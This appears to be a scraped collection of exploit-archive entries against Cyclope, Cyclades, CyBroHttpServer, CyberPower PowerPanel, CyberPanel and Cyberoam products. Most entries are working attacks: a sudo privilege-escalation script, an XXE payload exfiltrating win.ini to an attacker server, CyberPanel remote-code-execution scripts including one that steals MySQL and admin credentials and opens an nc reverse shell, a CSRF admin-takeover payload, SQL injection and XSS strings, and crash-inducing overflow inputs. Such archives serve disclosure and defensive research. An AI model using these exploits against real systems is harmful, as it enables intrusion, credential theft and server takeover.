#           NT AUTHORITY\SYSTEM:(I)(F)
#           BUILTIN\Users:(I)(RX)
#           NT AUTHORITY\Authenticated Users:(I)(M)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\Program Files\Cyclope\Client>icacls CyclopeClient.exe
# CyclopeClient.exe Everyone:(F)
# 
# Successfully processed 1 files; Failed processing 0 files
----

# C:\Program Files\Cyclope>icacls unins000.exe
# unins000.exe Everyone:(F)
# 
# Successfully processed 1 files; Failed processing 0 files
..
..
etc..
..
..
Way too many files to list, essentially whatever this thing installs it's up for grabs.
HireHackking 
# Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation
# Date: 09 Feb 2022
# Exploit Author: @ibby
# Vendor Homepage: https://www.vertiv.com/en-us/
# Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip
# Version: Legacy Versions V_1.0.0 to V_3.3.0-16
# Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)
# CVE : N/A

# The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges
## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014.
### This vulnerability does not exist in the newer distributions of the ACS Software.

#!/bin/bash

## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system.
## The software is publicly available, this will grab it and unpack the firmware for you.

#TMPDIR=$(mktemp -d)
#curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin
#sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers"
#echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky."


# ! EXPLOIT CODE BELOW ! #
# -------
# Once you exit the root shell, this will clean up and put the binaries back where they belong.
echo "Creating backups of sed & bash binaries"
sudo cp /bin/sed /bin/sed.bak
sudo cp /bin/bash /bin/bash.bak
echo "Saved as bash.bak & sed.bak"
sudo mv /bin/bash /bin/sed
sudo /bin/sed
echo "Replacing our binary with the proper one"
sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed
HireHackking 
# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133

# PoC
https://<host>\..\..\..\..\Windows\win.ini

# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png

GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HireHackking 
# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows 7 - 64-bit 
# CVE-2018-16134

# PoC
http://<host>/<script>alert('xss');</script>

GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HireHackking 
CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval


Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition

Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.

Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique resulting in disclosure and retrieval of arbitrary
data on the affected node via out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet using the ppbe.xml script is not sanitized while parsing the
xml inquiry payload returned by the JAXB element translation.

================================================================

C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------

94:  private InquirePayload splitInquirePayload(InputStream paramInputStream)
95:    throws RequestException
96:  {
97:    try
98:    {
99:      JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100:     Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101:     JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102:     return (InquirePayload)localJAXBElement.getValue();
103:   }
104:   catch (JAXBException localJAXBException)
105:   {
106:     localJAXBException.printStackTrace();
107:     throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108:   }
109: }

---

C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------

28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>

================================================================


Tested on: Microsoft Windows 7 Ultimate SP1 EN
           Microsoft Windows 8
           Microsoft Windows Server 2012
           Linux (64bit)
           MacOS X 10.6
           Jetty(7.5.0.v20110901)
           Java/1.8.0_91-b14
           SimpleHTTP/0.6 Python/2.7.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php


22.06.2016

--


C:\data\xxe.xml:
----------------

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">


Request:
--------

POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>



Response:
---------

C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
HireHackking 
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/

#!/usr/bin/python3

import argparse
import httpx
import sys

RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"

print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()

allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]

parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()

if args.endpoint not in allowed_endpoints:
    print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
    parser.print_help()
    sys.exit(1)

target = args.target
endpoint = args.endpoint

client = httpx.Client(base_url=target, verify=False)

try:
    response = client.get("/")
    response.raise_for_status()
except httpx.RequestError:
    print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
    sys.exit(1)

def get_token():
    response = client.get("/")
    return response.cookies.get("csrftoken")

def rce(client, csrf_token, cmd, endpoint):
    headers = {
        "X-CSRFToken": csrf_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    payload = '{"statusfile": "; %s; #"}' % cmd
    response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
    return response.json().get("requestStatus")

csrf_token = get_token()
if not csrf_token:
    print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
    sys.exit(1)

while True:
    cmd = input(f"{YELLOW}$> {RESET}")
    print(rce(client, csrf_token, cmd, endpoint))
HireHackking 
# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: <=2.1
# https://www.youtube.com/watch?v=J_8iLELVgkE


#!/usr/bin/python3
# -*- coding: utf-8 -*-
# CyberPanel - Remote Code Execution (Authenticated)
# author: twitter.com/numanturle
# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password


import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd

warnings.simplefilter('ignore',InsecureRequestWarning)

def init():
    parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
    parser.add_argument('-f', '--file',help='File', type=str)
    args = parser.parse_args()
    exploit(args)

def exploit(args):
    def on_open(ws):
        verifyPath,socket_password
        print("[+] Socket connection successful")
        print("[+] Trying a reverse connection")
        ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}}))
        ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password}))
        ws.close()

    def on_close(ws, close_status_code, close_msg):
        print("[+] Successful")
        print("[!] Disconnect from socket")


    session = requests.Session()
    target = "https://{}:8090".format(args.host)
    username = args.login
    password = args.password

    print("[+] Target {}".format(target))

    response = session.get(target, verify=False)
    session_hand = session.cookies.get_dict()
    token = session_hand["csrftoken"]

    print("[+] Token {}".format(token))

    headers = {
        'X-Csrftoken': token,
        'Cookie': 'csrftoken={}'.format(token),
        'Referer': target
    }

    login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"})
    login_json = json.loads(login.content)

    if login_json["loginStatus"]:
        session_hand_login = session.cookies.get_dict()

        print("[+] Login Success")
        print("[+] Send request fetch websites list")

        headers = {
            'X-Csrftoken': session_hand_login["csrftoken"],
            'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
            'Referer': target
        }

        feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10})
        feth_weblist_json = json.loads(feth_weblist.content)

        if feth_weblist_json["data"]:

            weblist_json = json.loads(feth_weblist_json["data"])
            domain = weblist_json[0]["domain"]
            domain_folder = "/home/{}".format(domain)

            print("[+] Successfully {} selected".format(domain))
            print("[+] Creating ssh pub")

            remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1})
            create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
            create_ssh_json = json.loads(create_ssh.content)

            if create_ssh_json["status"]:
                key = create_ssh_json["deploymentKey"]

                print("[+] Key : {}".format(key))

                explode_key = key.split()
                explode_username = explode_key[-1].split("@")

                if explode_username[0]:
                    username = explode_username[0]
                    hostname = explode_username[1]

                    print("[+] {} username selected".format(username))
                    print("[+] Preparing for symlink attack")
                    print("[+] Attempting symlink attack with user-level command execution vulnerability #1")

                    target_file = args.file
                    if not target_file:
                        target_file = "/root/.my.cnf"
                    domain_folder_ssh = "{}/.ssh".format(domain_folder)
                    command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username)
                    completeStartingPath = "{}';{};'".format(domain_folder,command)

                    #filemanager/controller - completeStartingPath - command execution vulnerability

                    symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
                    symlink_json = json.loads(symlink.content)
                    
                    if symlink_json["status"]:
                        print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file))

                        read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
                        read_file_json = json.loads(read_file.content)
                        read_file = read_file_json["deploymentKey"]
                        if not args.file:
                            print("-----------------------------------")
                            print(read_file.strip())
                            print("-----------------------------------")

                            mysql_password = re.findall('password=\"(.*?)\"',read_file)[0]
                            steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder)

                            print("[+] Fetching users tokens")

                            completeStartingPath = "{}';{}".format(domain_folder,steal_token)
                            steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
                            token_file = domain_folder+"/token.txt"
                            steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain})
                            leak = json.loads(steal_token_read_request.content)
                            leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:]
                            print("------------------------------")
                            for user in leak:
                                b64de = base64.b64decode(user).decode('utf-8')
                                exp_username = b64de.split(":")
                                if exp_username[0] == "admin":
                                    admin_password = exp_username[1]
                                print("[+] " + b64de)
                            print("------------------------------")
                            print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
                            print("[+] Try login admin")

                            headers = {
                                'X-Csrftoken': token,
                                'Cookie': 'csrftoken={}'.format(token),
                                'Referer': target
                            }
                            login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"})
                            login_json = json.loads(login_admin.content)
                            if login_json["loginStatus"]:
                                session_hand_login = session.cookies.get_dict()

                                print("[+] 4dm1n_l061n_5ucc355")
                                print("[+] c0nn3c71n6_70_73rm1n4l")
                                headers = {
                                        'X-Csrftoken': session_hand_login["csrftoken"],
                                        'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
                                        'Referer': target
                                }

                                get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False)
                                verifyPath = re.findall('id=\"verifyPath\">(.*?)</div>',str(get_websocket_token.content))[-1]
                                socket_password = re.findall('id=\"password\">(.*?)</div>',str(get_websocket_token.content))[-1]
                                print("[+] verifyPath {}".format(verifyPath))
                                print("[+] socketPassword {}".format(socket_password))
                                print("[+] Trying to connect to socket")
                                ws = websocket.WebSocketApp("wss://{}:5678".format(args.host),
                                    on_open=on_open,
                                    on_close=on_close)
                                ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})

                            else:
                                print("[-] Auto admin login failed")
                        else:
                            print(read_file)
                    else:
                        print("[-] Unexpected")
                else:
                    print("[-] Username selected failed")
            else:
                print("[-] Fail ssh pub")
        else:
            print("[-] List error")
    else:
        print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"]))

if __name__ == "__main__":
    init()
HireHackking 
# Title: CyberPanel Administrator Account Takeover <= v1.8.4
# Date: 30.06.2019
# Author: Bilgi Birikim Sistemleri
# Vendor Homepage: https://cyberpanel.net/
# Version: Up to v1.8.4.
# CVE: CVE-2019-13056
# mturkyilmaz@bilgibirikim.com & bilgibirikim.com

# Description:
# Attacker can edit administrator's credentials like email, password.
# Then, access the administration panel and takeover the server.
# A CSRF vulnerability.

# How to Reproduce:
# Attacker will create a website,
# CyberPanel administrator will visit that website,
# Administrator's e-mail and password will be changed automatically.

# PoC:
<script>
fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"attackersemail@example.org","password":"attackerspassword"}'});
</script>
HireHackking 
source: https://www.securityfocus.com/bid/51143/info

Cyberoam UTM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/corporate/Controller?mode=301&tableid=[SQL]&sort=&dir=
HireHackking 
source: https://www.securityfocus.com/bid/48814/info

Cyberoam UTM is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?srcip=<script>alert(document.cookie)</script>
HireHackking 
#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
#Tested Version: 2.1.2.5
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ctas_nn_2.1.2.5.py
#2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard
#3.- Open Cyberoam Transparent Authentication Suite
#4.- Select General > in Domain Type select "Microsoft Active Directory"
#5.- In "NetBIOS Name" Paste Clipboard
#6.- Click on "Apply"
#7.- Crashed! 

cod = "\x41" * 1500

f = open('ctas_nn_2.1.2.5.txt', 'w')
f.write(cod)
f.close()
HireHackking 
#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
#Tested Version: 2.1.2.5
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ctas_fqdn_2.1.2.5.py
#2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard
#3.- Open Cyberoam Transparent Authentication Suite
#4.- Select General > in Domain Type select "Microsoft Active Directory"
#5.- In "Fully Qualified Domain Name" paste Clipboard
#6.- Click on "Apply"
#7.- Crashed! 

cod = "\x41" * 1000

f = open('ctas_fqdn_2.1.2.5.txt', 'w')
f.write(cod)
f.close()
HireHackking 
#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
#Tested Version: 1.3.1.30
#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: c_sslvpn_http.py
#2.- Open c_sslvpn_http.txt and copy content to clipboard
#3.- Open Cyberoam SSLVPN Client
#4.- Select Proxy Settings > Enable "Manual Configuration"
#5.- In "HTTP Proxy" address field paste Clipboard
#6.- In "Port" type 80
#7.- Select "OK"
#8.- Crashed! 

cod = "\x41" * 5000

f = open('c_sslvpn_http.txt', 'w')
f.write(cod)
f.close()
HireHackking 
#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
#Tested Version: 1.3.1.30
#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: c_sslvpn_cts.py
#2.- Open c_sslvpn_cts.txt and copy content to clipboard
#3.- Open Cyberoam SSLVPN Client
#4.- Select Server Settings 
#5.- In "Connect To Server" field paste Clipboard
#6.- In "Port" type 80
#7.- Select "OK"
#8.- Crashed! 

cod = "\x41" * 5000

f = open('c_sslvpn_cts.txt', 'w')
f.write(cod)
f.close()
HireHackking 
#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
#Tested Version: 2.1.2.7
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: cgac_2.1.2.7.py
#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
#3.- Open Cyberoam General Authentication Client
#4.- In "Server Address" field paste Clipboard
#5.- Click on "Test"
#6.- Crashed! 

cod = "\x41" * 256

f = open('cgac_2.1.2.7.txt', 'w')
f.write(cod)
f.close()
HireHackking 
# Exploit Title: Cyberoam : Blind SQL Injection
# Date: 31/Aug/2015
# Exploit Author: Dharmendra Kumar Singh
# Contact: dsingh63@outlook.com
# Vendor Homepage: http://www.cyberoam.com
# Software Link: http://www.cyberoam.com/NGFW/
# Version: CR500iNG-XP - 10.6.2 MR-1
# Category: Firewall

1. Description

The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database.

The username field is vulnerable to the following types of SQL Injections

a) Boolean-based blind sql injection
b) Stacked queries

2. Proof of Concept

The data send to the server while logging in through the captive portal is like "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
The query generated in backend server must be something like this
SELECT password FROM table_name WHERE username = 'cyberuser'

a) Boolean-based blind sql injection
If a valid username/password combination is known than boolean-based blind sql injection can be done. If username is set to cyberuser' AND 'x'='x , data send will be "mode=191&username=cyberuser' AND 'x'='x&password=cyberpass&a=1439886198757&producttype=0"
And sql query will become

SELECT password FROM table_name WHERE username = 'cyberuser' AND 'x'='x'
A successfull login message will be received in response in this case. But if username is set to cyberuser' AND 'x'='y than login fail message will be received in response, since x is not equal to y, hence this confirms that username field is vulnerable to boolean-based blind sql injection

b) Stacked queries
if username is set to cyberuser';SELECT PG_SLEEP(5) --  the resultant sql query will become
SELECT password FROM table_name WHERE username = 'cyberuser';SELECT PG_SLEEP(5) -- '
The stacked sql query "SELECT PG_SLEEP(5)" will make the current session’s process sleep until 5 seconds have elapsed. This confirms that Postgresql Server is used and stacked queries can be executed by providing crafted input to username field.

3. Exploit

Since the techniques are blind hence it is recommended to use an automated tool like SQLMap to exploit the vulnerability. The following command can be used to initiate the exploit
sqlmap.py -u "http://example.com:8090/login.xml" --data "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"

4. Solution

The backend server scripts do not sanitize user-supplied data before using it in the SQL query. Hence by properly sanitizing the data received in GET variable "username", the vulnerability can be patched.

5. Conclusion

The Cyberoam NG Firewall devices <= Version: CR500iNG-XP - 10.6.2 MR-1 are vulnerable to blind SQL Injection and this vulnerability can be exploited by an attacker to compromise the application, access or modify data